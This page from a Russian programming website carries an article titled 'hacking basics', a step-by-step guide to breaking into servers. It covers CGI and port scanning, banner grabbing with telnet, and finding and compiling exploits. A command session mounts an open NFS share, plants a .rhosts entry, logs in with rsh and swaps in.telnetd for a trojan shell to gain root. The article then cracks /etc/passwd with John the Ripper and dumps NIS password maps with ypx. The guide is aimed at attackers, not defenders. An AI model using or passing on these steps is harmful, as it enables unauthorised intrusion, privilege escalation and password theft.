Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Содержание сайт... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Создание отчето... 63933
Модуль Forms 63639
ТЕХНОЛОГИИ ДОСТ... 60505
Пример работы с... 59942
Имитационное мо... 55984
Реклама
Сейчас на сайте
Гостей: 4
На сайте нет зарегистрированных пользователей

Пользователей: 13,079
новичок: Openair
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Моделирование работы крупного аэропорта на GPSS + Пояснительная записка
Калькулятор на Delphi с переводом в другую систему исчисления + Блок схемы
Двунаправленный динамический список на Delphi + Блок схемы

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
ОСНОВЫ ВЗЛОМА
Последнее время я получаю много вопросов по поводу того с чего же всё таки начинать взлом сервера(сайта,странички и тд), мне просто надоело каждый раз отвечать на этот вопрос и я решил написать по этому поводу статью. Итак,приступим. Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальнх сканеров которых слава богу сейчас предостаточно.Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr,его можно скачать с йх официального сайта www.cc.f2s.com,еще правда есть сканер от груааы Void (www.void.ru) -Но он немного уступает DCS по скорости сканирования. Ок,дальше,сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???,а дальше вам надо найти то как использовать этот эксплоит,я дам вам несколько ссылок где можжно найти описание этих ошибок: qwerty.nanko.ru (наиболее полный но на Английском) www.void.ru www.hack-crack.com или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска: www.packetstorm.securify.com www.securityfocus.com www.rootshell.com Второе и пожалуй главное-это сканирование портов,для сканирования можно использовать любой сканнер портов(какой-на ваш выбор-их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут www.nscan.hypermart.net,этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней) После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём,делаеться это с помощью клиента TELNET который есть даже в Вынь95(98,2000),в коммандной строке TELNET вы пишете telnet>open www.target.com и смотрите версию софта например WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. после того как вы посмотрели версию вы должны найти эксплоит под эту версию,идете опятьже на www.securityfocus.com www.packetstorm.securify.com www.technotronic.com и вводите в строке поиска название программы и его версию После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привисти к рабочему состоянию(как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд то и компилировать его надо под этими системами Если у вас нет установленного ЮНИКСА то вам в любом случае(если хотите чего нибудь ломать нужен Юникс Шелл-то есть оболочка Юникс) Бесплатно её можно получить на www.nether.net и тому подобных серверах(введите на любом поисковике UNIX+SHELL+FREE) Когда шелл получем и эксплоит скачен то можно приступать к компилированию,обычно эксплоит(в большинстве случаев) это программа на языке С для компиляции будем использовать компилятор GCC итак в командной строке оболочки пишем gcc -o exploit exploit.c и нижимаем Enter хочу так же заметить что программы в Юникс подобный системах запускаються с "./"+имя программы, в нашем случае эксплоит будет запускаться >./exploit Третье-еще один довольно популярный взлом системы это проверка на расшаренные папки,в Юникс то можно проверить с помощью утилиты showmount итак из оболочки запускаем showmount >showmount -e www.target.com и видим /user/ Everyone или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех дальше пишем >mount -t nfs target.remote.com:/user /mnt потом переходми в каталог cd /mnt/home и устанавливаем .rhosts >echo www.target.com user/.rhosts дальше делаем следующее: >cat /etc/passwd user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно) > su - user ! Становимся им $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! И заходим на удаленную машину % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Нашли программу, которая запустится !под root"ом из нашего каталога % cd /usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня % cat in.telnetd >!/bin/sh exec /bin/csh -i % chmod 755 in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! > chown user /etc; ! Делаем /etc своим : command not found > exit; : command not found Connection closed by foreign host. > cd /etc после того как у нас есть файл с паролями вы берет расшифровщик паролей Юникс -John The Ripper запускаете его и ждете пока расшифруються пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе! И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера Из облочки запускаем >rpcinfo -p www.target.com | grep bind и если видим что=то типа 120000 2 udp 2493 ypbind то пробуем сдлать следующее >ypx -o target.passwd -g target.remote.com Берём файл с паролями и запускаем подборщик. На этом все! Если увас есть какие нибудь вопросы пишите webmaster@hackworld.ru FreeRID aka lEX //TDTeam.(c)
Опубликовал Kest October 26 2008 16:11:36 · 0 Комментариев · 8325 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
EMSQuickImport
Архив программ
Trojan [Исходник ...
Binary2XMLDemo (Р...
Добавление к ссы...
Error mod
DelTrayIcon [Исхо...
AUTOWEB
Дарахвелидзе П., ...
Основы Delphi
isoCanvas (Редакт...
BSButton
Пример работы с р...
DemoEdit [Исходни...
Секреты программи...
WordReport
C++ Builder: Книг...
ScrollCredit
Анекдоты с ostrie.ru
FreeSMS v1.3.1

Топ загрузок
Приложение Клие... 100450
Delphi 7 Enterp... 85845
Converter AMR<-... 20067
GPSS World Stud... 12518
Borland C++Buil... 11579
Borland Delphi ... 8507
Turbo Pascal fo... 7023
Visual Studio 2... 4989
Калькулятор [Ис... 4739
FreeSMS v1.3.1 3536
Случайные статьи
Магистральное соед...
Объекты Connection...
Проблема представл...
Использование комб...
8.4. Сканирующий а...
Чтобы обеспечить д...
Числовые SQL-функц...
Персептрону. Пробл...
Порождение класса ...
Простой дизайн
• Очереди с приори...
Помимо вызова акти...
Определить инициал...
Подбор плитки в кухню
Как перемещать кур...
Общие функции оцен...
Основные понятия О...
Память для классов...
Задачи управления ...
Шаблоны
Разрешить клиентам...
Способен ли сервер...
9.6. Заключение
Разделяемая память.
Чтобы лучше исполь...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?